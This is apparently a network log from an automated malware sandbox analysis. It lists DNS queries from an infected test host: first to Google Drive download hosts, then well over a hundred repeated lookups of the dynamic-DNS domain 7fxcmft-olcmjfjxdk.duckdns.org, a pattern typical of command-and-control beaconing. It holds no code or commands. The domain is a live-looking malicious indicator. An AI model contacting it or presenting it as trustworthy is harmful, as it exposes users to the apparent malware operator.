        Jul 5, 2024 07:33:24.330660105 CEST6477953192.168.11.201.1.1.1
        Jul 5, 2024 07:33:24.473052979 CEST53647791.1.1.1192.168.11.20
        Jul 5, 2024 07:33:28.486810923 CEST5620553192.168.11.201.1.1.1
        Jul 5, 2024 07:33:28.606885910 CEST53562051.1.1.1192.168.11.20
        Jul 5, 2024 07:33:32.610466957 CEST6050553192.168.11.201.1.1.1
        Jul 5, 2024 07:33:32.730272055 CEST53605051.1.1.1192.168.11.20
        Jul 5, 2024 07:33:32.730817080 CEST6265953192.168.11.201.1.1.1
        Jul 5, 2024 07:33:32.850589037 CEST53626591.1.1.1192.168.11.20
        Jul 5, 2024 07:33:41.577270031 CEST6154353192.168.11.201.1.1.1
        Jul 5, 2024 07:33:41.698071957 CEST53615431.1.1.1192.168.11.20
        Jul 5, 2024 07:33:41.698573112 CEST5224253192.168.11.201.1.1.1
        Jul 5, 2024 07:33:41.824421883 CEST53522421.1.1.1192.168.11.20
        Jul 5, 2024 07:33:45.826467991 CEST6335353192.168.11.201.1.1.1
        Jul 5, 2024 07:33:45.946624994 CEST53633531.1.1.1192.168.11.20
        Jul 5, 2024 07:33:49.950337887 CEST6131953192.168.11.201.1.1.1
        Jul 5, 2024 07:33:50.070390940 CEST53613191.1.1.1192.168.11.20
        Jul 5, 2024 07:33:50.071043015 CEST5838753192.168.11.201.1.1.1
        Jul 5, 2024 07:33:50.191128969 CEST53583871.1.1.1192.168.11.20
        Jul 5, 2024 07:33:54.199400902 CEST6434653192.168.11.201.1.1.1
        Jul 5, 2024 07:33:54.323664904 CEST53643461.1.1.1192.168.11.20
        Jul 5, 2024 07:33:54.324243069 CEST5433653192.168.11.201.1.1.1
        Jul 5, 2024 07:33:54.444036961 CEST53543361.1.1.1192.168.11.20
        Jul 5, 2024 07:33:58.448565006 CEST5993453192.168.11.201.1.1.1
        Jul 5, 2024 07:33:58.568097115 CEST53599341.1.1.1192.168.11.20
        Jul 5, 2024 07:34:02.572613955 CEST6021353192.168.11.201.1.1.1
        Jul 5, 2024 07:34:02.692255020 CEST53602131.1.1.1192.168.11.20
        Jul 5, 2024 07:34:02.692707062 CEST5393353192.168.11.201.1.1.1
        Jul 5, 2024 07:34:02.813441038 CEST53539331.1.1.1192.168.11.20
        Jul 5, 2024 07:34:06.821726084 CEST6287853192.168.11.201.1.1.1
        Jul 5, 2024 07:34:06.941401958 CEST53628781.1.1.1192.168.11.20
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jul 5, 2024 07:26:11.574145079 CEST192.168.11.201.1.1.10xbee0Standard query (0)drive.google.comA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:12.232944965 CEST192.168.11.201.1.1.10x2f6aStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:14.761617899 CEST192.168.11.201.1.1.10x381bStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:14.942125082 CEST192.168.11.201.1.1.10x6ac5Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:19.111713886 CEST192.168.11.201.1.1.10xbd38Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:19.764436007 CEST192.168.11.201.1.1.10x3c9aStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:23.891860962 CEST192.168.11.201.1.1.10x4f11Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:28.047240973 CEST192.168.11.201.1.1.10x8008Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:28.198390961 CEST192.168.11.201.1.1.10x99f6Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:32.358983040 CEST192.168.11.201.1.1.10x8184Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:32.513267994 CEST192.168.11.201.1.1.10x4da0Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:36.670463085 CEST192.168.11.201.1.1.10xe47eStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:40.825817108 CEST192.168.11.201.1.1.10x1519Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:40.979696035 CEST192.168.11.201.1.1.10x4bb3Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:45.138207912 CEST192.168.11.201.1.1.10x1ee3Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:45.291476965 CEST192.168.11.201.1.1.10xf550Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:49.417490005 CEST192.168.11.201.1.1.10xb086Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:53.573075056 CEST192.168.11.201.1.1.10x4c74Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:53.723932028 CEST192.168.11.201.1.1.10x966dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:26:57.619803905 CEST192.168.11.201.1.1.10xcf94Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:01.024384022 CEST192.168.11.201.1.1.10x328dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:01.177186012 CEST192.168.11.201.1.1.10x58ecStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:04.195566893 CEST192.168.11.201.1.1.10x9a4eStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:06.788978100 CEST192.168.11.201.1.1.10x2225Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:06.909369946 CEST192.168.11.201.1.1.10x5be2Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:09.178945065 CEST192.168.11.201.1.1.10xa759Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:13.349919081 CEST192.168.11.201.1.1.10x3a6dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:13.471371889 CEST192.168.11.201.1.1.10xa035Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:17.645929098 CEST192.168.11.201.1.1.10x4c97Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:21.816977024 CEST192.168.11.201.1.1.10xfa84Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:21.938502073 CEST192.168.11.201.1.1.10x47f8Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:26.065880060 CEST192.168.11.201.1.1.10xf134Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:30.205653906 CEST192.168.11.201.1.1.10x5e0eStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:30.356949091 CEST192.168.11.201.1.1.10xe906Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:34.486049891 CEST192.168.11.201.1.1.10xfc4fStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:38.641545057 CEST192.168.11.201.1.1.10xa35cStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:38.793565035 CEST192.168.11.201.1.1.10x9fb4Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:42.921611071 CEST192.168.11.201.1.1.10xfb91Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:47.092721939 CEST192.168.11.201.1.1.10xf11aStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:47.213579893 CEST192.168.11.201.1.1.10x22e3Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:51.076275110 CEST192.168.11.201.1.1.10x354cStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:54.435360909 CEST192.168.11.201.1.1.10xc3c8Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:54.574064970 CEST192.168.11.201.1.1.10xa0ccStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:27:57.514396906 CEST192.168.11.201.1.1.10x1200Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:00.075546980 CEST192.168.11.201.1.1.10x3b19Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:00.203062057 CEST192.168.11.201.1.1.10x7a7aStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:02.443226099 CEST192.168.11.201.1.1.10x6f02Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:04.450004101 CEST192.168.11.201.1.1.10x9706Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:04.590970993 CEST192.168.11.201.1.1.10xc324Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:06.325480938 CEST192.168.11.201.1.1.10x184dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:07.825994968 CEST192.168.11.201.1.1.10xce9dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:09.177014112 CEST192.168.11.201.1.1.10xe7b7Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:09.298749924 CEST192.168.11.201.1.1.10x3abcStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:10.472661018 CEST192.168.11.201.1.1.10x93f1Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:11.535684109 CEST192.168.11.201.1.1.10x5aaeStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:12.477794886 CEST192.168.11.201.1.1.10x9245Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:13.289719105 CEST192.168.11.201.1.1.10x6560Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:17.414041996 CEST192.168.11.201.1.1.10x87c1Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:17.535738945 CEST192.168.11.201.1.1.10xcb10Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:21.662921906 CEST192.168.11.201.1.1.10x11c5Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:25.802687883 CEST192.168.11.201.1.1.10x4a3eStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:25.924593925 CEST192.168.11.201.1.1.10x200Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:30.051711082 CEST192.168.11.201.1.1.10x39ffStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:34.207081079 CEST192.168.11.201.1.1.10x8bcfStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:34.364288092 CEST192.168.11.201.1.1.10xde50Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:38.502978086 CEST192.168.11.201.1.1.10x7e1Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:42.642749071 CEST192.168.11.201.1.1.10xe4feStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:42.762733936 CEST192.168.11.201.1.1.10xbb6fStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:46.891971111 CEST192.168.11.201.1.1.10x48f9Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:51.016226053 CEST192.168.11.201.1.1.10x3cccStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:51.136846066 CEST192.168.11.201.1.1.10x1d00Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:55.264933109 CEST192.168.11.201.1.1.10x8ef0Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:55.417047024 CEST192.168.11.201.1.1.10xe7edStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:28:59.560934067 CEST192.168.11.201.1.1.10x1433Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:03.684997082 CEST192.168.11.201.1.1.10xcce1Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:03.806469917 CEST192.168.11.201.1.1.10x67e8Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:07.934043884 CEST192.168.11.201.1.1.10xee67Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:12.058307886 CEST192.168.11.201.1.1.10xcc8eStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:12.179800034 CEST192.168.11.201.1.1.10x6c9bStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:16.307224035 CEST192.168.11.201.1.1.10xc8f9Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:16.429347038 CEST192.168.11.201.1.1.10xefd4Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:20.556267977 CEST192.168.11.201.1.1.10x4da0Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:24.680347919 CEST192.168.11.201.1.1.10x96d6Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:24.801280975 CEST192.168.11.201.1.1.10x5ec9Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:28.945240974 CEST192.168.11.201.1.1.10xf5aStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:33.069128990 CEST192.168.11.201.1.1.10xbc16Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:33.191046953 CEST192.168.11.201.1.1.10x46eaStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:37.318317890 CEST192.168.11.201.1.1.10x3998Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:37.438713074 CEST192.168.11.201.1.1.10xaaebStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:41.583283901 CEST192.168.11.201.1.1.10x5320Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:45.707156897 CEST192.168.11.201.1.1.10x6cabStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:45.828180075 CEST192.168.11.201.1.1.10x25c9Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:49.956351042 CEST192.168.11.201.1.1.10x8f11Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:54.080549955 CEST192.168.11.201.1.1.10xdffeStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:54.201030970 CEST192.168.11.201.1.1.10xde04Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:58.329286098 CEST192.168.11.201.1.1.10x1aaStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:29:58.450031996 CEST192.168.11.201.1.1.10x4418Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:02.578596115 CEST192.168.11.201.1.1.10x280dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:06.702465057 CEST192.168.11.201.1.1.10xfb3eStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:06.828092098 CEST192.168.11.201.1.1.10x928fStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:10.951648951 CEST192.168.11.201.1.1.10x7e39Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:15.075824022 CEST192.168.11.201.1.1.10x9f3Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:15.196923971 CEST192.168.11.201.1.1.10xba22Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:19.324716091 CEST192.168.11.201.1.1.10x8c19Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:19.467308998 CEST192.168.11.201.1.1.10x91cStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:23.605125904 CEST192.168.11.201.1.1.10xb7c1Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:27.731312990 CEST192.168.11.201.1.1.10x72bStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:27.852046013 CEST192.168.11.201.1.1.10x77baStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:31.978163958 CEST192.168.11.201.1.1.10xedafStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:36.102248907 CEST192.168.11.201.1.1.10x2b45Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:36.223138094 CEST192.168.11.201.1.1.10x3bbaStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:40.351392031 CEST192.168.11.201.1.1.10x2b30Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:40.471816063 CEST192.168.11.201.1.1.10x2426Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:44.600617886 CEST192.168.11.201.1.1.10xd793Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:48.724997997 CEST192.168.11.201.1.1.10x1662Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:48.845848083 CEST192.168.11.201.1.1.10x4e63Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:52.973571062 CEST192.168.11.201.1.1.10x730dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:57.097762108 CEST192.168.11.201.1.1.10xbd9bStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:30:57.218034983 CEST192.168.11.201.1.1.10xb1b3Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:01.346761942 CEST192.168.11.201.1.1.10xf348Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:01.467026949 CEST192.168.11.201.1.1.10x6a30Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:05.595834970 CEST192.168.11.201.1.1.10xec6cStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:09.719978094 CEST192.168.11.201.1.1.10xdf98Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:09.871073008 CEST192.168.11.201.1.1.10xbd35Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:14.000277996 CEST192.168.11.201.1.1.10xf38fStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:18.124366045 CEST192.168.11.201.1.1.10xf9b5Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:18.247915983 CEST192.168.11.201.1.1.10x43c3Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:22.373657942 CEST192.168.11.201.1.1.10x3bdeStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:26.497694969 CEST192.168.11.201.1.1.10xa4bcStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:26.625643015 CEST192.168.11.201.1.1.10x1fc2Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:30.762202978 CEST192.168.11.201.1.1.10x7287Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:34.886457920 CEST192.168.11.201.1.1.10xc692Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:35.007153988 CEST192.168.11.201.1.1.10x2a41Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:39.135469913 CEST192.168.11.201.1.1.10xe0caStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:39.258922100 CEST192.168.11.201.1.1.10xabbeStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:43.384486914 CEST192.168.11.201.1.1.10x5126Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:47.508517027 CEST192.168.11.201.1.1.10xb4fbStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:47.628586054 CEST192.168.11.201.1.1.10xe49bStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:51.757656097 CEST192.168.11.201.1.1.10x1f77Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:55.897947073 CEST192.168.11.201.1.1.10x9a44Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:56.023582935 CEST192.168.11.201.1.1.10x1d8fStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:00.146457911 CEST192.168.11.201.1.1.10xb18cStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:00.266660929 CEST192.168.11.201.1.1.10x987Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:04.395394087 CEST192.168.11.201.1.1.10xf409Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:08.519547939 CEST192.168.11.201.1.1.10x8a1cStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:08.639723063 CEST192.168.11.201.1.1.10xb7edStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:12.768580914 CEST192.168.11.201.1.1.10xd9ffStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:16.908322096 CEST192.168.11.201.1.1.10xd7c7Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:17.028665066 CEST192.168.11.201.1.1.10x819aStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:21.157521009 CEST192.168.11.201.1.1.10x1f6fStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:21.289329052 CEST192.168.11.201.1.1.10x1fb3Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:25.422256947 CEST192.168.11.201.1.1.10x7bd6Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:29.577725887 CEST192.168.11.201.1.1.10x5f10Standard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:29.699894905 CEST192.168.11.201.1.1.10x576dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:33.826432943 CEST192.168.11.201.1.1.10xac6fStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:37.950609922 CEST192.168.11.201.1.1.10xeb4dStandard query (0)7fxcmft-olcmjfjxdk.duckdns.orgA (IP address)IN (0x0001)false
